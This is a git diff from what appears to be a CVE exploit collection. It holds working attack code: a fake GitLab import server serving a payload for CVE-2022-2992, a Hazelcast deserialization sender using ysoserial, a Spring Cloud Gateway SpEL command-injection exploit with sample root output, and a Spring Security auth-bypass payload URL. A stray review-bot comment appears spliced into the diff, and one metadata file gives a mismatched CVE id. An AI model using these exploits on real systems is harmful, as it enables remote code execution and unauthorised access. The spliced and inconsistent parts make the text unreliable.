done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000', + 200, + {"Content-Type": "application/x-git-upload-pack-result"}, + ) + + +@app.before_request +def log_request(): + app.logger.debug("Request Path %s", request.path) + 
app.logger.debug("Request Data %s", request.data) + return None + + +@app.route("/repositories/12345") +def repo(): + return jsonify(REPO_JSON) + + +@app.route("/api/v3/repositories/12345") +def repo_legacy(): + return jsonify(REPO_JSON) + + +@app.route("/api/v3/repos/fake/name") +def repo_info(): + return jsonify( + { + "default_branch": { + "to_s": { + "to_s": PAYLOAD, + "bytesize": 3, + } + } + } + ) + + +@app.route("/api/v3/rate_limit") +def rate_limit(): + return ( + jsonify({}), + 200, + {"X-RateLimit-Limit": "100000", "X-RateLimit-Remaining": "100000"}, + ) + + +@app.route("/", defaults={"path": ""}, methods=HTTP_METHODS) +@app.route("/", methods=HTTP_METHODS) +def proxy(path): + return jsonify({}) diff --git a/cve/gitlab/2022/yaml/CVE-2022-2992.yaml b/cve/gitlab/2022/yaml/CVE-2022-2992.yaml index 4600a13bce10d5ee262ac330f8edcd72b4be97dc..531d568c08132d5411f3ebcc0f04c6a0f06d5382 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-2992.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-2992.yaml 
@@ -1,27 +1,27 @@ -id: CVE-2022-2992 -source: https://github.com/CsEnox/CVE-2022-2992 -info: - name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 - severity: critical - description: | - A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. - scope-of-influence: - 11.10 <= GitLab(CE/EE)< 15.1.6 - 15.2 <= GitLab(CE/EE)< 15.2.4 - 15.3 <= GitLab(CE/EE)< 15.3.2 - reference: - - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json - - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json - - http://packetstormsecurity.com/files/171008/GitLab-GitHub-Repo-Import-Deserialization-Remote-Code-Execution.html - - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 - - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 - - https://hackerone.com/reports/1679624 - - https://hackerone.com/reports/1679624 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.9 - cve-id: CVE-2022-2292 - cwe-id: CWE-77 - cnvd-id: None - kve-id: None +id: CVE-2022-2992 +source: https://github.com/CsEnox/CVE-2022-2992 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: critical + description: | + A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. 
+ scope-of-influence: + 11.10 <= GitLab(CE/EE)< 15.1.6 + 15.2 <= GitLab(CE/EE)< 15.2.4 + 15.3 <= GitLab(CE/EE)< 15.3.2 + reference: + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2992.json + - http://packetstormsecurity.com/files/171008/GitLab-GitHub-Repo-Import-Deserialization-Remote-Code-Execution.html + - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 + - https://gitlab.com/gitlab-org/gitlab/-/issues/371884 + - https://hackerone.com/reports/1679624 + - https://hackerone.com/reports/1679624 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2022-2292 + cwe-id: CWE-77 + cnvd-id: None + kve-id: None tags: cve2022, gitlab \ No newline at end of file diff --git a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py index a7fac033e38e130e889d4d9a5b84a4e5653a29ed..856961aa81b2a20c246f51467e21fd65a6cf2dcc 100644 --- a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py +++ b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py 
@@ -1,32 +1,32 @@ -import socket -import threading -import time -import sys -import os -groupName = b"" -clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -def socketRecv(clientSocket): - global groupName - while(1): - groupName += clientSocket.recv(1024) -if __name__ == '__main__': - - ip = sys.argv[1] - payloadType = sys.argv[2] - payload = sys.argv[3] - - os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser") - print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser") - clientSocket.connect((ip, 5701)) - obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,)) - obj1.start() - file = open("1.ser", 'rb') - filebyte = file.read() - print(filebyte) - - print("输入 send 发送payload") - if(input("INPUT:")=="send"): - print(groupName) - clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte) - time.sleep(10) - clientSocket.close() +import socket +import threading +import time +import sys +import os +groupName = b"" +clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +def socketRecv(clientSocket): + global groupName + while(1): + groupName += clientSocket.recv(1024) +if __name__ == '__main__': + + ip = sys.argv[1] + payloadType = sys.argv[2] + payload = sys.argv[3] + + os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser") + print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser") + clientSocket.connect((ip, 5701)) + obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,)) + obj1.start() + file = open("1.ser", 'rb') + filebyte = file.read() + print(filebyte) + + print("输入 send 发送payload") + if(input("INPUT:")=="send"): + print(groupName) + clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte) + time.sleep(10) + clientSocket.close() diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md index d744b0b88862a5de15b73bbec6ba379cfa26e9ef..2276b740dde31f295f9c954ad6ad8f717640b82e 100644 
--- a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md 
@@ -1,44 +1,44 @@ -# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) -###### CVE: CVE-2022-22947 -###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) -###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. - - -#### Usage -```sh -git clone https://github.com/carlosevieira/CVE-2022-22947 -cd CVE-2022-22947 -pip3 install -r requirements.txt -python3 exploit.py http://target 'id' -``` - -```sh -john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' - - ################################################### - # # - # Exploit for CVE-2022-22947 # - # - Carlos Vieira (Crowsec) # - # # - # Usage: # - # python3 exploit.py # - # # - # Example: # - # python3 exploit.py http://localhost:8080 'id' # - # # - ################################################### - -[+] Stage deployed to /actuator/gateway/routes/rtxhovup -[+] Executing command... -[+] getting result... -[+] Stage removed! -uid=0(root) gid=0(root) groups=0(root) -``` - -#### References - -https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ - -https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published - +# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) +###### CVE: CVE-2022-22947 +###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) +###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. 
+ + +#### Usage +```sh +git clone https://github.com/carlosevieira/CVE-2022-22947 +cd CVE-2022-22947 +pip3 install -r requirements.txt +python3 exploit.py http://target 'id' +``` + +```sh +john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' + + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + +[+] Stage deployed to /actuator/gateway/routes/rtxhovup +[+] Executing command... +[+] getting result... +[+] Stage removed! +uid=0(root) gid=0(root) groups=0(root) +``` + +#### References + +https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ + +https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published + https://tanzu.vmware.com/security/cve-2022-22947 \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py index 953f4759313e13774e616d2d23425caac61ba577..d7e2b150bf07e7fc4e00cf2cc95273d973fe285e 100644 --- a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py 
@@ -1,76 +1,76 @@ -import random -import string -import requests -import json -import sys -import urllib.parse -import base64 -import urllib3 -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) - -headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} - -id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) - -def exploit(url, command): - - payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} - - rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) - if(rbase.status_code == 201): - print("[+] Stage deployed to /actuator/gateway/routes/"+id) - print("[+] Executing command...") - r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) - if(r.status_code == 200): - print("[+] getting result...") - r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) - if(r.status_code == 200): - get_response = r.json() - clean(url, id) - return get_response['filters'][0].split("'")[1] - else: - print("[-] Error: Invalid response") - clean(url, id) - exit(1) - else: - clean(url, id) - print("[-] Error executing command") - else: - print("[X] Error: Fail to deploy stage (Patched ?)") - exit(1) - -def clean(url, id): - remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) - if(remove.status_code == 200): - print("[+] Stage removed!") - else: - print("[-] Error: Fail to remove stage") - -def banner(): - print(""" - ################################################### - # # - # Exploit for CVE-2022-22947 # - # - Carlos 
Vieira (Crowsec) # - # # - # Usage: # - # python3 exploit.py # - # # - # Example: # - # python3 exploit.py http://localhost:8080 'id' # - # # - ################################################### - """) - -def main(): - banner() - if len(sys.argv) != 3: - print("[-] Error: Invalid arguments") - print("[-] Usage: python3 exploit.py ") - exit(1) - else: - url = sys.argv[1] - command = sys.argv[2] - print(exploit(url, command)) -if __name__ == '__main__': +import random +import string +import requests +import json +import sys +import urllib.parse +import base64 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} + +id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) + +def exploit(url, command): + + payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} + + rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) + if(rbase.status_code == 201): + print("[+] Stage deployed to /actuator/gateway/routes/"+id) + print("[+] Executing command...") + r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) + if(r.status_code == 200): + print("[+] getting result...") + r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(r.status_code == 200): + get_response = r.json() + clean(url, id) + return get_response['filters'][0].split("'")[1] + else: + print("[-] Error: Invalid response") + clean(url, id) + exit(1) + else: + clean(url, id) + print("[-] Error executing command") + 
else: + print("[X] Error: Fail to deploy stage (Patched ?)") + exit(1) + +def clean(url, id): + remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(remove.status_code == 200): + print("[+] Stage removed!") + else: + print("[-] Error: Fail to remove stage") + +def banner(): + print(""" + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + """) + +def main(): + banner() + if len(sys.argv) != 3: + print("[-] Error: Invalid arguments") + print("[-] Usage: python3 exploit.py ") + exit(1) + else: + url = sys.argv[1] + command = sys.argv[2] + print(exploit(url, command)) +if __name__ == '__main__': main() \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml index 21923f4393f1f89566eae5d3de2fd2a82b8b91b8..281211f29cdfaf38bb46517289e46cbc2ccead71 100644 --- a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml 
@@ -1,22 +1,22 @@ -id: CVE-2022-22947 -source: - https://github.com/crowsec-edtech/CVE-2022-22947 -info: - name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 - severity: critical - description: | - Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。 - scope-of-influence: - Spring Cloud GateWay 3.1.0 - Spring Cloud GateWay >=3.0.0, <=3.0.6 - Spring Cloud GateWay <3.0.0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: CVE-2022-22947 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None +id: CVE-2022-22947 +source: + https://github.com/crowsec-edtech/CVE-2022-22947 +info: + name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 + severity: critical + description: | + Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。 + scope-of-influence: + Spring Cloud GateWay 3.1.0 + Spring Cloud GateWay >=3.0.0, <=3.0.6 + Spring Cloud GateWay <3.0.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2022-22947 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None tags: cve2022, spring-cloud-gateway \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/.gitignore b/cve/java-spring-security/2022/CVE-2022-22978/.gitignore new file mode 100644 index 0000000000000000000000000000000000000000..589f69dd5ac54a808cd82e72381e2599726b3d6d --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/.gitignore 
@@ -0,0 +1,58 @@ +HELP.md +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### STS ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### IntelliJ IDEA ### +.idea +*.iws +*.iml +*.ipr + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ +### Java template +# Compiled class file +*.class + +# Log file +*.log + +# BlueJ files +*.ctxt + +# Mobile Tools for Java (J2ME) +.mtj.tmp/ + +# Package Files # +*.jar +*.war +*.nar +*.ear +*.zip +*.tar.gz +*.rar + +# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml +hs_err_pid* + diff --git a/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties b/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties new file mode 100644 index 0000000000000000000000000000000000000000..b7cb93e7050f42ff587aefbc40cc038ad4fa3271 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/.mvn/wrapper/maven-wrapper.properties @@ -0,0 +1,2 @@ +distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.4/apache-maven-3.8.4-bin.zip +wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar diff --git a/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile b/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile new file mode 100644 index 0000000000000000000000000000000000000000..f7771d2f0361ff6bbb8873bca924687e77e8fd38 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/Dockerfile @@ -0,0 +1,5 @@ +FROM openjdk:8-jdk-alpine +MAINTAINER S0cke3t +EXPOSE 8080 +ADD target/CVE-2022-22978-0.0.1-SNAPSHOT.jar demo.jar +ENTRYPOINT exec java -jar /demo.jar \ No newline at end of file 
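Review bot: The container runs the demo JVM as root because no `USER` instruction precedes the `ENTRYPOINT` on the last line of the Dockerfile; even a deliberately vulnerable lab image should drop privileges, e.g. `RUN adduser -D -H app` followed by `USER app` immediately before `ENTRYPOINT`. Two smaller points on the same five lines: `ADD` should be `COPY` since nothing is being extracted or fetched, and `MAINTAINER` is deprecated in favour of `LABEL maintainer="S0cke3t"`. The `openjdk:8-jdk-alpine` base appears to be an unmaintained tag, which is acceptable for reproducing CVE-2022-22978 but deserves a one-line comment so nobody reuses this Dockerfile as a baseline.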
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/README.md b/cve/java-spring-security/2022/CVE-2022-22978/README.md new file mode 100644 index 0000000000000000000000000000000000000000..d73d4d3c58ecd652c3bdd81a0cc42d1b9c396494 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/README.md @@ -0,0 +1,12 @@ +### CVE-2022-22978 Spring-Security bypass Demo +>在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时,攻击者可以通过构造恶意数据包绕过身份认证 +### 影响范围 +>Spring Security 5.5.x < 5.5.7 +Spring Security 5.6.x < 5.6.4 +### 复现 +![img.png](img.png) +![img_1.png](img_1.png) +### Paylaod +>http://localhost:8080/admin/index%0a +### Docker +> docker pull s0cke3t/cve-2022-22978:latest \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/img.png b/cve/java-spring-security/2022/CVE-2022-22978/img.png new file mode 100644 index 0000000000000000000000000000000000000000..3cd0812251ae3e69ff81e7180dd78659ba1ff3ec Binary files /dev/null and b/cve/java-spring-security/2022/CVE-2022-22978/img.png differ diff --git a/cve/java-spring-security/2022/CVE-2022-22978/img_1.png b/cve/java-spring-security/2022/CVE-2022-22978/img_1.png new file mode 100644 index 0000000000000000000000000000000000000000..7209864900bb1ff0df6a98b93d93f891a5414306 Binary files /dev/null and b/cve/java-spring-security/2022/CVE-2022-22978/img_1.png differ diff --git a/cve/java-spring-security/2022/CVE-2022-22978/mvnw b/cve/java-spring-security/2022/CVE-2022-22978/mvnw new file mode 100644 index 0000000000000000000000000000000000000000..8a8fb2282df5b8f7263470a5a2dc0e196f35f35f --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/mvnw 
@@ -0,0 +1,316 @@ +#!/bin/sh +# ---------------------------------------------------------------------------- +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, +# software distributed under the License is distributed on an +# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +# KIND, either express or implied. See the License for the +# specific language governing permissions and limitations +# under the License. +# ---------------------------------------------------------------------------- + +# ---------------------------------------------------------------------------- +# Maven Start Up Batch script +# +# Required ENV vars: +# ------------------ +# JAVA_HOME - location of a JDK home dir +# +# Optional ENV vars +# ----------------- +# M2_HOME - location of maven2's installed home dir +# MAVEN_OPTS - parameters passed to the Java VM when running Maven +# e.g. to debug Maven itself, use +# set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +# MAVEN_SKIP_RC - flag to disable loading of mavenrc files +# ---------------------------------------------------------------------------- + +if [ -z "$MAVEN_SKIP_RC" ] ; then + + if [ -f /usr/local/etc/mavenrc ] ; then + . /usr/local/etc/mavenrc + fi + + if [ -f /etc/mavenrc ] ; then + . /etc/mavenrc + fi + + if [ -f "$HOME/.mavenrc" ] ; then + . "$HOME/.mavenrc" + fi + +fi + +# OS specific support. $var _must_ be set to either true or false. 
+cygwin=false; +darwin=false; +mingw=false +case "`uname`" in + CYGWIN*) cygwin=true ;; + MINGW*) mingw=true;; + Darwin*) darwin=true + # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home + # See https://developer.apple.com/library/mac/qa/qa1170/_index.html + if [ -z "$JAVA_HOME" ]; then + if [ -x "/usr/libexec/java_home" ]; then + export JAVA_HOME="`/usr/libexec/java_home`" + else + export JAVA_HOME="/Library/Java/Home" + fi + fi + ;; +esac + +if [ -z "$JAVA_HOME" ] ; then + if [ -r /etc/gentoo-release ] ; then + JAVA_HOME=`java-config --jre-home` + fi +fi + +if [ -z "$M2_HOME" ] ; then + ## resolve links - $0 may be a link to maven's home + PRG="$0" + + # need this for relative symlinks + while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG="`dirname "$PRG"`/$link" + fi + done + + saveddir=`pwd` + + M2_HOME=`dirname "$PRG"`/.. + + # make it fully qualified + M2_HOME=`cd "$M2_HOME" && pwd` + + cd "$saveddir" + # echo Using m2 at $M2_HOME +fi + +# For Cygwin, ensure paths are in UNIX format before anything is touched +if $cygwin ; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --unix "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --unix "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --unix "$CLASSPATH"` +fi + +# For Mingw, ensure paths are in UNIX format before anything is touched +if $mingw ; then + [ -n "$M2_HOME" ] && + M2_HOME="`(cd "$M2_HOME"; pwd)`" + [ -n "$JAVA_HOME" ] && + JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`" +fi + +if [ -z "$JAVA_HOME" ]; then + javaExecutable="`which javac`" + if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then + # readlink(1) is not available as standard on Solaris 10. + readLink=`which readlink` + if [ ! 
`expr "$readLink" : '\([^ ]*\)'` = "no" ]; then + if $darwin ; then + javaHome="`dirname \"$javaExecutable\"`" + javaExecutable="`cd \"$javaHome\" && pwd -P`/javac" + else + javaExecutable="`readlink -f \"$javaExecutable\"`" + fi + javaHome="`dirname \"$javaExecutable\"`" + javaHome=`expr "$javaHome" : '\(.*\)/bin'` + JAVA_HOME="$javaHome" + export JAVA_HOME + fi + fi +fi + +if [ -z "$JAVACMD" ] ; then + if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + else + JAVACMD="`\\unset -f command; \\command -v java`" + fi +fi + +if [ ! -x "$JAVACMD" ] ; then + echo "Error: JAVA_HOME is not defined correctly." >&2 + echo " We cannot execute $JAVACMD" >&2 + exit 1 +fi + +if [ -z "$JAVA_HOME" ] ; then + echo "Warning: JAVA_HOME environment variable is not set." +fi + +CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher + +# traverses directory structure from process work directory to filesystem root +# first directory with .mvn subdirectory is considered project base directory +find_maven_basedir() { + + if [ -z "$1" ] + then + echo "Path not specified to find_maven_basedir" + return 1 + fi + + basedir="$1" + wdir="$1" + while [ "$wdir" != '/' ] ; do + if [ -d "$wdir"/.mvn ] ; then + basedir=$wdir + break + fi + # workaround for JBEAP-8937 (on Solaris 10/Sparc) + if [ -d "${wdir}" ]; then + wdir=`cd "$wdir/.."; pwd` + fi + # end of workaround + done + echo "${basedir}" +} + +# concatenates all lines of a file +concat_lines() { + if [ -f "$1" ]; then + echo "$(tr -s '\n' ' ' < "$1")" + fi +} + +BASE_DIR=`find_maven_basedir "$(pwd)"` +if [ -z "$BASE_DIR" ]; then + exit 1; +fi + +########################################################################################## +# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +# This allows using the maven wrapper 
